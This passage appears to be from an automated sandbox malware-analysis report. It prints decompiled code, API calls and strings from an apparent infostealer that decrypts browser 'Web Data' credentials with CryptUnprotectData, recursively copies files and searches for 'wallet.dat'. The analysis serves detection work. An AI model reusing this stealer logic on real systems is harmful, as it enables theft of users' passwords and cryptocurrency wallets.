							_t196 = 0xfffffffd;
							return _t196;
						}
						_t273 = 0xfffffffe;
						L22:
						LocalFree(_t278);
						LocalFree(_t210);
						return _t273;
					}
					_t273 = 0xffffffffffffffff;
					goto L22;
				}
			}

0x0040324b
0x0040324d
0x00403250
0x0040325c
0x0040325e
0x00403265
0x0040326d
0x00403278
0x00403286
0x0040328f
0x00403292
0x0040329c
0x004032a9
0x004032ac
0x004032b9
0x004032bb
0x004032be
0x004032c3
0x004032c3
0x004032e1
0x004032e5
0x004032f0
0x004032f5
0x004032fb
0x00403307
0x00403307
0x004032fb
0x0040330d
0x00403312
0x00403312
0x0040331c
0x00403321
0x00403321
0x0040332b
0x00403330
0x00403330
0x00403338
0x0040333b
0x0040333b
0x00403343
0x00403346
0x00403346
0x0040334c
0x00403351
0x0040373f
0x00000000
0x00403357
0x00403363
0x0040336b
0x00403376
0x0040337e
0x00403389
0x00403391
0x0040339c
0x004033a4
0x004033af
0x004033b7
0x004033c2
0x004033ca
0x004033d5
0x004033dd
0x004033ef
0x004033fc
0x00403409
0x00403419
0x0040341f
0x00403424
0x00403427
0x0040342c
0x00403431
0x00403746
0x00403747
0x0040374e
0x00000000
0x0040375b
0x00403441
0x00403445
0x00000000
0x00000000
0x00403450
0x0040345a
0x00403465
0x00403490
0x00403496
0x0040349b
0x004034bd
0x004034ca
0x0040370e
0x00403710
0x00403713
0x00403713
0x0040371c
0x00403725
0x0040372e
0x00403736
0x00403739
0x00403739
0x00000000
0x00403736
0x004034d0
0x004034d5
0x004034d6
0x004034db
0x004034e6
0x004034e9
0x004034f4
0x004034f7
0x00403501
0x00403504
0x0040350f
0x00403511
0x00403514
0x0040351a
0x0040351f
0x00000000
0x00000000
0x00403525
0x00403526
0x00403533
0x00000000
0x00000000
0x00403539
0x0040353b
0x00403548
0x00000000
0x00000000
0x0040354e
0x00403550
0x0040355d
0x00000000
0x00000000
0x00403573
0x00403577
0x0040357d
0x00403587
0x00403589
0x0040358e
0x00403594
0x0040359a
0x0040359d
0x004035a3
0x004036eb
0x004036ec
0x004036f4
0x00000000
0x004036f4
0x004035bd
0x004035bf
0x004035c4
0x004035ca
0x004035cf
0x004035d0
0x004035d7
0x0040365d
0x00403660
0x00403663
0x00403664
0x00403665
0x00403666
0x00403667
0x0040366b
0x00403672
0x00403677
0x004036da
0x004036dd
0x004036df
0x004036e2
0x004036e2
0x004036e8
0x00000000
0x004036e8
0x0040367f
0x00403683
0x0040369d
0x004036a5
0x004036a7
0x004036af
0x004036b3
0x004036b6
0x004036c1
0x004036c1
0x004036c7
0x004036cc
0x004036cc
0x0040364a
0x0040364a
0x00000000
0x0040364a
0x004035f0
0x004035fd
0x0040363a
0x004035ff
0x0040361a
0x0040361c
0x00403624
0x00403628
0x0040362b
0x00403636
0x00403636
0x0040362b
0x00403641
0x00000000
0x00403647
0x0040364a
0x00000000
0x0040364a
0x004036f5
0x004036f5
0x004036ff
0x00403708
0x0040370b
0x00000000
0x0040370b
0x0040349e
0x004034a5
0x004034ae
0x004034b7
0x00000000
0x004034b7
0x00403469
0x0040346a
0x0040346b
0x00403472
0x00000000
0x00403478
0x0040345c
0x00000000
0x0040345c

APIs

LocalFree.KERNEL32(00000000), ref: 004032C3

Part of subcall function 0040A69E: LocalFree.KERNEL32(00000000,?,?,0040B2D2), ref: 0040A701

CryptUnprotectData.CRYPT32(00000200,00000000,00000000,00000000,00000000,00000000,?), ref: 004032E1
LocalFree.KERNEL32(00000000), ref: 00403312
LocalFree.KERNEL32(00000000), ref: 00403321
LocalFree.KERNEL32(00000000), ref: 00403330
LocalFree.KERNEL32(00000000), ref: 0040333B
LocalFree.KERNEL32(00000000), ref: 00403346
CopyFileW.KERNEL32(00000000,?,00000000), ref: 00403441
LocalFree.KERNEL32(00000000), ref: 0040346B
LocalFree.KERNEL32(?), ref: 00403472
LocalFree.KERNEL32(00000000), ref: 0040349E
LocalFree.KERNEL32(?), ref: 004034A5
LocalFree.KERNEL32(00000000), ref: 00403747
DeleteFileW.KERNEL32(?), ref: 0040374E
LocalFree.KERNEL32(?), ref: 00403755

Strings

Web Data, xrefs: 00403411
v10, xrefs: 004035CA

Memory Dump Source

Source File: 00000014.00000002.439745303.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.440168036.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: FreeLocal$File$CopyCryptDataDeleteUnprotect
String ID: Web Data$v10
API String ID: 1742448742-1846122625
Opcode ID: 452dee4c139b824143a0166505d536948669178c0ee45589a4d705fb7e9a228e
Instruction ID: 7d7504f3382372b0d825977313a65c8cc92f857bae52c0927fac6ea5572d7f51
Opcode Fuzzy Hash: 452dee4c139b824143a0166505d536948669178c0ee45589a4d705fb7e9a228e
Instruction Fuzzy Hash: 1FF1A171900214EFDB15DFA6EE44AAE7BB9FB08311F104835F511B72A0DB759E20CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00405B5B Relevance: 44.1, APIs: 20, Strings: 5, Instructions: 372
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 44%

			E00405B5B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, WCHAR* _a20, WCHAR* _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr* _a36, intOrPtr _a40, char _a44) {
				void* _v12;
				signed int _v16;
				void* _v20;
				void* _v24;
				WCHAR* _v28;
				void* _v32;
				void* _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* _v48;
				void* _v52;
				signed int _v56;
				void* _v60;
				void* _v64;
				void* _v68;
				struct _WIN32_FIND_DATAW _v664;
				void* __ebx;
				void* __esi;
				void* _t112;
				signed int _t114;
				void* _t117;
				void* _t119;
				void* _t120;
				void* _t121;
				WCHAR* _t122;
				int _t125;
				void* _t127;
				WCHAR* _t129;
				intOrPtr _t135;
				WCHAR* _t136;
				void* _t138;
				void* _t140;
				signed int _t144;
				signed int _t148;
				WCHAR* _t151;
				WCHAR* _t158;
				WCHAR* _t162;
				void* _t167;
				unsigned int _t175;
				WCHAR* _t177;
				WCHAR* _t182;
				void* _t186;
				WCHAR* _t189;
				void* _t191;
				WCHAR* _t192;
				void* _t194;
				void* _t195;
				WCHAR* _t196;
				void* _t201;
				void* _t202;
				char* _t232;
				intOrPtr _t233;
				intOrPtr _t239;
				WCHAR* _t245;
				intOrPtr _t249;
				signed int _t251;
				signed int _t252;
				WCHAR* _t253;
				void* _t254;
				void* _t255;
				void* _t259;
				void* _t260;
				unsigned int _t261;
				void* _t262;
				void* _t264;
				void* _t265;
				void* _t267;

				_t1 =  &_a44; // 0x406321
				_t249 =  *_t1;
				_v44 = __edx;
				_v40 = __ecx;
				if(_t249 <= _a40) {
					_v16 = _v16 & 0x00000000;
					_t112 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
					_t195 =  *((intOrPtr*)( *0x40e13c))(_t112, _a4);
					_v52 = _t195;
					_t114 =  *((intOrPtr*)( *0x40e08c))(_t195);
					_t201 = 0x5c;
					__eflags =  *((intOrPtr*)(_t195 + _t114 * 2 - 2)) - _t201;
					_t202 = _t195;
					if( *((intOrPtr*)(_t195 + _t114 * 2 - 2)) == _t201) {
						_push( *0x40e3d0);
						_v16 = 1;
					} else {
						_push( *0x40e1d0);
					}
					E0040188C(_t195, _t202, 0x104, _t259);
					_t117 = FindFirstFileW(_t195,  &_v664); // executed
					_v36 = _t117;
					__eflags = _t117 - 0xffffffff;
					if(_t117 != 0xffffffff) {
						_t260 = _v36;
						_t196 = _v16;
						do {
							__eflags = _v664.dwFileAttributes & 0x00000010;
							if((_v664.dwFileAttributes & 0x00000010) == 0) {
								_t119 =  *((intOrPtr*)( *0x40e044))(0x40, 0x410);
								_t120 =  *((intOrPtr*)( *0x40e13c))(_t119, _a4);
								__eflags = _t196;
								if(_t196 == 0) {
									_t233 =  *0x40e258; // 0x4e5d00
									_t120 = E0040A503(_t120, _t233);
								}
								_t232 =  &(_v664.cFileName);
								_t121 = E0040A503(_t120, _t232);
								_t261 = _v664.nFileSizeHigh;
								_t251 = _v664.nFileSizeLow;
								__eflags = _a24;
								_v12 = _t121;
								if(_a24 == 0) {
									_t122 = 0;
									__eflags = 0;
								} else {
									_t232 = L"*.lnk";
									_t122 = E0040A70E( &(_v664.cFileName), _t232);
								}
								__eflags = _v12;
								_v28 = _t122;
								if(_v12 == 0) {
									L52:
									LocalFree(_v12);
									goto L53;
								} else {
									_t135 = _a28;
									_t252 = (_t261 << 0x00000020 | _t251) >> 0xa;
									asm("cdq");
									__eflags = _t261 >> 0xa - _t232;
									if(__eflags > 0) {
										goto L52;
									}
									if(__eflags < 0) {
										L23:
										_t136 = E0040A70E( &(_v664.cFileName), _a12);
										__eflags = _t136;
										if(_t136 == 0) {
											L25:
											_t253 = _v28;
											__eflags = _t253;
											if(_t253 == 0) {
												goto L52;
											}
											L28:
											_t138 =  *((intOrPtr*)( *0x40e044))(0x40, 0x618);
											_t140 = E0040A503( *((intOrPtr*)( *0x40e13c))(_t138,  *0x40e1b8), _v40);
											_t239 =  *0x40e1b8; // 0x4e5b60
											_v20 = E0040A503(E0040A503(_t140, _t239), _v44);
											__eflags = _t253;
											if(_t253 == 0) {
												_t264 = 0;
												__eflags = 0;
											} else {
												_t191 = E00408FA5(_v12); // executed
												_t264 = _t191;
											}
											_t144 =  *((intOrPtr*)( *0x40e044))(0x40, 0x618);
											_v16 = _t144;
											_v32 =  *((intOrPtr*)( *0x40e044))(0x40, 0x410);
											__eflags = _t253;
											if(_t253 != 0) {
												_t186 =  *((intOrPtr*)( *0x40e08c))(_t264);
												__eflags = _t186 - 4;
												if(_t186 > 4) {
													_t189 =  *((intOrPtr*)( *0x40e0e0))(_t264, 0, 0x5c) + 2;
													__eflags = _t189;
													StrCpyW(_v32, _t189);
												}
											}
											_t148 =  *((intOrPtr*)( *0x40e08c))(_a8);
											__eflags = _t253;
											_t150 =  !=  ? _v32 : 0;
											_t151 = E0040A2AA(_v12 + _t148 * 2,  &_v16,  !=  ? _v32 : 0);
											__eflags = _t151;
											if(_t151 == 0) {
												L51:
												LocalFree(_v32);
												LocalFree(_v16);
												LocalFree(_v20);
												goto L52;
											} else {
												_t218 = _v20;
												_v20 = E0040A503(_v20, _v16);
												__eflags = _t253;
												if(_t253 == 0) {
													_t254 = _v12;
													L41:
													_v24 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
													_t158 = E0040A69E(_t218,  &_v24);
													_t265 = _v24;
													__eflags = _t158;
													if(_t158 == 0) {
														L50:
														DeleteFileW(_t265);
														LocalFree(_t265);
														goto L51;
													}
													_t162 =  *((intOrPtr*)( *0x40e184))(_t254, _t265, 0);
													__eflags = _t162;
													if(_t162 == 0) {
														goto L50;
													}
													_t255 =  *((intOrPtr*)( *0x40e03c))(_t265, 0x80000000, 1, 0, 4, 0, 0);
													 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _v20, 0xffffffff, 0, 0, 0, 0);
													_v48 = 0;
													_t167 =  *((intOrPtr*)( *0x40e044))(0x40, 0x30c);
													_t245 = _v48;
													_v24 = 0;
													__eflags = _t245;
													if(_t245 == 0) {
														L49:
														LocalFree(_t167);
														CloseHandle(_t255);
														goto L50;
													}
													 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _v20, 0xffffffff, 0, _t245, 0, 0);
													__eflags = 0;
													if(0 == 0) {
														L48:
														_t167 = _v24;
														goto L49;
													}
													__eflags = _v28;
													if(_v28 == 0) {
														L47:
														_t223 = _a36;
														_v56 = _v56 & 0x00000000;
														_v68 = _v24;
														_v64 = _t255;
														_v60 = _t265;
														 *_t223 =  *_a36 + 1;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														goto L51;
													}
													_t175 =  *((intOrPtr*)( *0x40e14c))(_t255, 0);
													__eflags = _t175 >> 0xa - _a28;
													if(_t175 >> 0xa >= _a28) {
														goto L48;
													}
													goto L47;
												}
												_t177 = E0040A70E(_t264, _a12);
												__eflags = _t177;
												if(_t177 == 0) {
													L39:
													LocalFree(_v32);
													LocalFree(_v12);
													LocalFree(_v20);
													LocalFree(_v16);
													LocalFree(_t264);
													L53:
													_t107 =  &_a44; // 0x406321
													_t249 =  *_t107;
													L54:
													_t260 = _v36;
													goto L55;
												}
												_t218 = _t264;
												_t182 = E0040A70E(_t264, _a16);
												__eflags = _t182;
												if(_t182 != 0) {
													goto L39;
												}
												_t254 =  *((intOrPtr*)( *0x40e13c))(_v12, _t264);
												_v12 = _t254;
												LocalFree(_t264);
												goto L41;
											}
										}
										_t192 = E0040A70E( &(_v664.cFileName), _a16);
										__eflags = _t192;
										if(_t192 == 0) {
											_t253 = _v28;
											goto L28;
										}
										goto L25;
									}
									__eflags = _t252 - _t135;
									if(_t252 >= _t135) {
										goto L52;
									}
									goto L23;
								}
							}
							__eflags = _v664.cFileName - 0x2e;
							if(_v664.cFileName == 0x2e) {
								goto L55;
							}
							__eflags = _a20;
							if(_a20 == 0) {
								goto L55;
							}
							_t127 =  *((intOrPtr*)( *0x40e044))(0x40, 0x410);
							_t262 =  *((intOrPtr*)( *0x40e000))(_t127, _a4,  &(_v664.cFileName));
							_t129 = E0040A70E( &(_v664.cFileName), _a16);
							__eflags = _t129;
							if(_t129 == 0) {
								_t26 = _t249 + 1; // 0x1
								E00405B5B(_v40, _v44, _t262, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _t26); // executed
								_t267 = _t267 + 0x2c;
							}
							LocalFree(_t262);
							goto L54;
							L55:
							_t125 = FindNextFileW(_t260,  &_v664); // executed
							__eflags = _t125;
						} while (_t125 != 0);
						_t110 =  &_v52; // 0x406321
						LocalFree( *_t110);
						FindClose(_t260);
						goto L57;
					} else {
						LocalFree(_t195);
						L57:
						__eflags = 0;
						return 0;
					}
				}
				_t194 = 2;
				return _t194;
			}

0x00405b67
0x00405b67
0x00405b6a
0x00405b6d
0x00405b73
0x00405b82
0x00405b8d
0x00405ba1
0x00405ba4
0x00405ba7
0x00405bab
0x00405bb1
0x00405bb6
0x00405bb8
0x00405bc2
0x00405bc8
0x00405bba
0x00405bba
0x00405bba
0x00405bcf
0x00405be1
0x00405be3
0x00405be6
0x00405be9
0x00405bf7
0x00405bfa
0x00405bfd
0x00405bfd
0x00405c04
0x00405c9d
0x00405ca9
0x00405cab
0x00405cad
0x00405caf
0x00405cb7
0x00405cb7
0x00405cbc
0x00405cc4
0x00405cc9
0x00405cd1
0x00405cd7
0x00405cdb
0x00405cde
0x00405cf2
0x00405cf2
0x00405ce0
0x00405ce0
0x00405ceb
0x00405ceb
0x00405cf4
0x00405cf8
0x00405cfb
0x00405fad
0x00405fb0
0x00000000
0x00405d01
0x00405d01
0x00405d04
0x00405d08
0x00405d0c
0x00405d0e
0x00000000
0x00000000
0x00405d14
0x00405d1e
0x00405d27
0x00405d2c
0x00405d2e
0x00405d42
0x00405d42
0x00405d45
0x00405d47
0x00000000
0x00000000
0x00405d52
0x00405d5e
0x00405d74
0x00405d79
0x00405d90
0x00405d93
0x00405d95
0x00405da3
0x00405da3
0x00405d97
0x00405d9a
0x00405d9f
0x00405d9f
0x00405db1
0x00405db8
0x00405dc4
0x00405dc7
0x00405dc9
0x00405dd2
0x00405dd4
0x00405dd7
0x00405de5
0x00405de5
0x00405dec
0x00405dec
0x00405dd7
0x00405dfa
0x00405e04
0x00405e09
0x00405e0e
0x00405e14
0x00405e16
0x00405f92
0x00405f95
0x00405f9e
0x00405fa7
0x00000000
0x00405e1c
0x00405e1f
0x00405e27
0x00405e2a
0x00405e2c
0x00405e8d
0x00405e90
0x00405ea1
0x00405ea4
0x00405ea9
0x00405eac
0x00405eae
0x00405f84
0x00405f85
0x00405f8c
0x00000000
0x00405f8c
0x00405ebd
0x00405ebf
0x00405ec1
0x00000000
0x00000000
0x00405ee3
0x00405ef6
0x00405f05
0x00405f08
0x00405f0a
0x00405f0d
0x00405f10
0x00405f12
0x00405f76
0x00405f77
0x00405f7e
0x00000000
0x00405f7e
0x00405f2c
0x00405f2e
0x00405f30
0x00405f73
0x00405f73
0x00000000
0x00405f73
0x00405f32
0x00405f36
0x00405f4a
0x00405f4a
0x00405f50
0x00405f54
0x00405f59
0x00405f65
0x00405f6b
0x00405f6d
0x00405f6e
0x00405f6f
0x00405f70
0x00000000
0x00405f70
0x00405f40
0x00405f45
0x00405f48
0x00000000
0x00000000
0x00000000
0x00405f48
0x00405e33
0x00405e38
0x00405e3a
0x00405e63
0x00405e66
0x00405e6f
0x00405e78
0x00405e81
0x00405fb0
0x00405fb0
0x00405fb6
0x00405fb6
0x00405fb9
0x00405fb9
0x00000000
0x00405fb9
0x00405e3f
0x00405e41
0x00405e46
0x00405e48
0x00000000
0x00000000
0x00405e55
0x00405e58
0x00405e5b
0x00000000
0x00405e5b
0x00405e16
0x00405d39
0x00405d3e
0x00405d40
0x00405d4f
0x00000000
0x00405d4f
0x00000000
0x00405d40
0x00405d16
0x00405d18
0x00000000
0x00000000
0x00000000
0x00405d18
0x00405cfb
0x00405c0a
0x00405c12
0x00000000
0x00000000
0x00405c18
0x00405c1c
0x00000000
0x00000000
0x00405c2e
0x00405c4c
0x00405c4e
0x00405c53
0x00405c55
0x00405c57
0x00405c7d
0x00405c82
0x00405c82
0x00405c86
0x00000000
0x00405fbc
0x00405fc9
0x00405fcb
0x00405fcb
0x00405fd3
0x00405fd7
0x00405fde
0x00000000
0x00405beb
0x00405bec
0x00405fe4
0x00405fe4
0x00000000
0x00405fe4
0x00405be9
0x00405b77
0x00000000

APIs

FindFirstFileW.KERNEL32(00000000,?), ref: 00405BE1
LocalFree.KERNEL32(00000000), ref: 00405BEC

Strings

*.lnk, xrefs: 00405CE0
!c@, xrefs: 00405B67, 00405FB6
., xrefs: 00405C0A
`[N, xrefs: 00405D79
!c@, xrefs: 00405FD3, 00405FD6

Memory Dump Source

Source File: 00000014.00000002.439745303.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.440168036.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: FileFindFirstFreeLocal
String ID: !c@$!c@$*.lnk$.$`[N
API String ID: 972134204-1360246693
Opcode ID: b2bc6981046b89f0825e8fe3b22cdd010d50f795f2c34f4df7670a783b0ff52d
Instruction ID: a0bd4d6dd4f3a97f7616e57fc29639dad099fc1712c2800218aeb084a22374ad
Opcode Fuzzy Hash: b2bc6981046b89f0825e8fe3b22cdd010d50f795f2c34f4df7670a783b0ff52d
Instruction Fuzzy Hash: 75D1AC71A00216ABEF04DFA5CD44EAF7775EF48300F104929FA15B72A0DB78A951CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040B177 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 275
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 27%

			E0040B177(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr* _a20) {
				char _v568;
				struct _WIN32_FIND_DATAW _v616;
				WCHAR* _v632;
				void* _v640;
				signed int _v648;
				void* _v660;
				void* _v664;
				intOrPtr _v684;
				void* _v688;
				WCHAR* _v696;
				void* _v716;
				void* _v732;
				intOrPtr _v748;
				intOrPtr _v760;
				char _v764;
				intOrPtr _v772;
				intOrPtr _v780;
				intOrPtr _v788;
				signed int _v800;
				void* _v804;
				void* _v812;
				void* _v816;
				void* _v820;
				void* _v824;
				void* _v828;
				void* _v836;
				void* __ebx;
				void* __esi;
				void* _t66;
				void* _t70;
				void* _t78;
				void* _t86;
				void* _t89;
				void* _t96;
				void* _t98;
				void* _t99;
				void* _t100;
				void* _t102;
				intOrPtr _t103;
				void* _t116;
				void* _t117;
				void* _t127;
				WCHAR* _t128;
				void* _t130;
				WCHAR* _t132;
				intOrPtr _t172;
				intOrPtr _t173;
				intOrPtr _t177;
				void* _t182;
				void* _t183;
				void* _t185;
				void* _t189;
				signed int _t190;
				void* _t192;
				void* _t194;
				signed int _t196;
				void* _t198;

				_t198 = (_t196 & 0xfffffff8) - 0x28c;
				_t183 = __edx;
				_t190 = __ecx;
				_v640 = __edx;
				_v648 = __ecx;
				_t66 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a, _t182, _t189, _t127);
				_t128 =  *((intOrPtr*)( *0x40e13c))(_t66, _a4);
				_v632 = _t128;
				E0040188C(_t128, _t128, 0x104, __ecx,  *0x40e1d0);
				_t70 = FindFirstFileW(_t128,  &_v616); // executed
				_v664 = _t70;
				if(_t70 == 0xffffffff) {
					L21:
					return 0;
				}
				_t130 = _t70;
				do {
					if((_v616.ftCreationTime & 0x00000010) == 0) {
						if(E0040A70E( &_v568, _a8) == 0 || E0040A70E( &_v568, _a12) != 0) {
							goto L19;
						} else {
							_t86 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
							_t185 =  *((intOrPtr*)( *0x40e000))(_t86, _a4,  &(_v616.dwReserved1));
							_v660 = _t185;
							_v696 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
							_t89 = E0040A69E( *0x40e044,  &_v696);
							_t132 = _v696;
							if(_t89 == 0) {
								L17:
								LocalFree(_t132);
								LocalFree(_t185);
								DeleteFileW(_t132);
								L18:
								_t130 = _v688;
								_t183 = _v684;
								goto L19;
							}
							_push(0);
							_push(_t132);
							_push(_t185);
							if( *((intOrPtr*)( *0x40e184))() == 0) {
								goto L17;
							}
							_t96 =  *((intOrPtr*)( *0x40e03c))(_t132, 0x80000000, 1, 0, 4, 0, 0);
							_v716 = _t96;
							GetFileSize(_t96, 0);
							_t98 =  *((intOrPtr*)( *0x40e044))(0x40, 0x618);
							_t99 =  *((intOrPtr*)( *0x40e13c))(_t98,  *0x40e1b8);
							_t172 =  *0x40e1b4; // 0x4fe610
							_t100 = E0040A503(_t99, _t172);
							_t173 =  *0x40e1b8; // 0x4e5b60
							_t102 = E0040A503(E0040A503(_t100, _t173), _t190);
							_t103 =  *((intOrPtr*)( *0x40e044))(0x40, 0x618);
							_v760 = _t103;
							E0040A2AA(_t185 +  *((intOrPtr*)( *0x40e08c))(0) * 2,  &_v764, _v748);
							_t194 = E0040A503(_t102, _v764);
							_v732 = _t194;
							 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t194, 0xffffffff, 0, 0, 0, 0);
							_v772 = 0;
							 *((intOrPtr*)( *0x40e044))(0x40, 0x144);
							_t177 = _v780;
							_v788 = 0;
							if(_t177 == 0) {
								L16:
								LocalFree(_t132);
								LocalFree(_t194);
								LocalFree(_v804);
								LocalFree(_t185);
								L14:
								_t190 = _v800;
								goto L18;
							}
							 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t194, 0xffffffff, 0, _t177, 0, 0);
							if(0 != 0) {
								_t116 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
								_v804 = _v828;
								_v800 = _v824;
								_t117 =  *((intOrPtr*)( *0x40e13c))(_t116, _t132);
								_t160 = _a20;
								_v800 = _v800 & 0x00000000;
								_v804 = _t117;
								 *_t160 =  *_a20 + 1;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t185 = _v824;
								_t194 = _v820;
								goto L16;
							}
							LocalFree(_t194);
							LocalFree(_v820);
							LocalFree(_v836);
							LocalFree(_t132);
							LocalFree(_t185);
							CloseHandle(_v816);
							DeleteFileW(_t132);
							goto L14;
						}
					}
					if(_v568 != 0x2e && E0040A70E( &_v568, _a8) != 0 && E0040A70E( &_v568, _a12) == 0) {
						_t78 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
						_t192 =  *((intOrPtr*)( *0x40e000))(_t78, _a4,  &(_v616.dwReserved1));
						E0040B177(_v684, _t183, _t192, _a8, _a12, _a16, _a20);
						_t198 = _t198 + 0x14;
						LocalFree(_t192);
						_t190 = _v684;
					}
					L19:
					_push( &(_v616.ftCreationTime));
					_push(_t130);
				} while ( *((intOrPtr*)( *0x40e148))() != 0);
				LocalFree(_v640);
				FindClose(_t130);
				goto L21;
			}

0x0040b17d
0x0040b190
0x0040b192
0x0040b196
0x0040b19a
0x0040b19e
0x0040b1b2
0x0040b1bb
0x0040b1bf
0x0040b1d0
0x0040b1d2
0x0040b1d9
0x0040b4e6
0x0040b4ee
0x0040b4ee
0x0040b1df
0x0040b1e1
0x0040b1e6
0x0040b27a
0x00000000
0x0040b294
0x0040b2a1
0x0040b2ba
0x0040b2bf
0x0040b2c9
0x0040b2cd
0x0040b2d2
0x0040b2d8
0x0040b4a3
0x0040b4a4
0x0040b4ab
0x0040b4b2
0x0040b4b8
0x0040b4b8
0x0040b4bc
0x00000000
0x0040b4bc
0x0040b2e3
0x0040b2e5
0x0040b2e6
0x0040b2eb
0x00000000
0x00000000
0x0040b305
0x0040b30a
0x0040b30e
0x0040b321
0x0040b330
0x0040b332
0x0040b33a
0x0040b33f
0x0040b350
0x0040b364
0x0040b372
0x0040b37f
0x0040b396
0x0040b39a
0x0040b3ab
0x0040b3ba
0x0040b3be
0x0040b3c0
0x0040b3c4
0x0040b3ca
0x0040b482
0x0040b483
0x0040b48a
0x0040b494
0x0040b49b
0x0040b428
0x0040b428
0x00000000
0x0040b428
0x0040b3e6
0x0040b3ea
0x0040b43d
0x0040b44a
0x0040b453
0x0040b457
0x0040b459
0x0040b460
0x0040b465
0x0040b474
0x0040b476
0x0040b477
0x0040b478
0x0040b479
0x0040b47a
0x0040b47e
0x00000000
0x0040b47e
0x0040b3ed
0x0040b3f8
0x0040b402
0x0040b409
0x0040b410
0x0040b41b
0x0040b422
0x00000000
0x0040b422
0x0040b27a
0x0040b1f2
0x0040b22c
0x0040b246
0x0040b254
0x0040b259
0x0040b25d
0x0040b263
0x0040b263
0x0040b4c0
0x0040b4c9
0x0040b4ca
0x0040b4cd
0x0040b4d9
0x0040b4e0
0x00000000

APIs

FindFirstFileW.KERNEL32(00000000,?), ref: 0040B1D0
GetFileSize.KERNEL32(00000000,00000000), ref: 0040B30E
LocalFree.KERNEL32(00000000), ref: 0040B3ED
LocalFree.KERNEL32(?), ref: 0040B3F8
LocalFree.KERNEL32(?), ref: 0040B402
LocalFree.KERNEL32(?), ref: 0040B409
LocalFree.KERNEL32(00000000), ref: 0040B410
CloseHandle.KERNEL32(?), ref: 0040B41B
DeleteFileW.KERNEL32(?), ref: 0040B422
LocalFree.KERNEL32(?), ref: 0040B483
LocalFree.KERNEL32(00000000), ref: 0040B48A
LocalFree.KERNEL32(?), ref: 0040B494
LocalFree.KERNEL32(00000000), ref: 0040B49B
LocalFree.KERNEL32(?), ref: 0040B4A4
LocalFree.KERNEL32(00000000), ref: 0040B4AB
DeleteFileW.KERNEL32(?), ref: 0040B4B2
LocalFree.KERNEL32(?), ref: 0040B4D9
FindClose.KERNEL32(00000000), ref: 0040B4E0

Part of subcall function 0040A70E: LocalAlloc.KERNEL32(00000040,00000000), ref: 0040A741
Part of subcall function 0040A70E: LocalFree.KERNEL32(?), ref: 0040A7C2

Part of subcall function 0040B177: LocalFree.KERNEL32(00000000), ref: 0040B25D

Strings

., xrefs: 0040B1EC
`[N, xrefs: 0040B33F

Memory Dump Source

Source File: 00000014.00000002.439745303.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.440168036.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: Local$Free$File$CloseDeleteFind$AllocFirstHandleSize
String ID: .$`[N
API String ID: 322622607-394231097
Opcode ID: 48fb149053ef200d459f7f380ceaf91d03eb9e8f41a1b2d18255321c7608b971
Instruction ID: d7038f412777c1620d74c121b4857271da971a97c01f51cff95b18f8f793f09e
Opcode Fuzzy Hash: 48fb149053ef200d459f7f380ceaf91d03eb9e8f41a1b2d18255321c7608b971
Instruction Fuzzy Hash: A5A1B171204301AFD704DF62DD88E6B77A9EF88704F004D29FA55A72A1DB74ED10CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 0040AE06 Relevance: 33.6, APIs: 17, Strings: 2, Instructions: 300
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 0040AE4E
FindFirstFileW.KERNEL32(00000000,?), ref: 0040AE9C
LocalFree.KERNEL32(00000000), ref: 0040AEA9
LocalFree.KERNEL32(00000000), ref: 0040AEB0

Strings

]N, xrefs: 0040AE7C
wallet.dat, xrefs: 0040AF43

Memory Dump Source

Source File: 00000014.00000002.439745303.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.440168036.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: FreeLocal$FileFindFirstFolderPathSpecial
String ID: wallet.dat$]N
API String ID: 2611946579-2376598787
Opcode ID: d18511dcb49cecff3af7a8a3a4a2ac7ba367992507ce9e77723320c17dcaae13
Instruction ID: c428bda3d7e2fbc090b10557d15fab42b18105d23257a4f21a5ceef78d5d1267
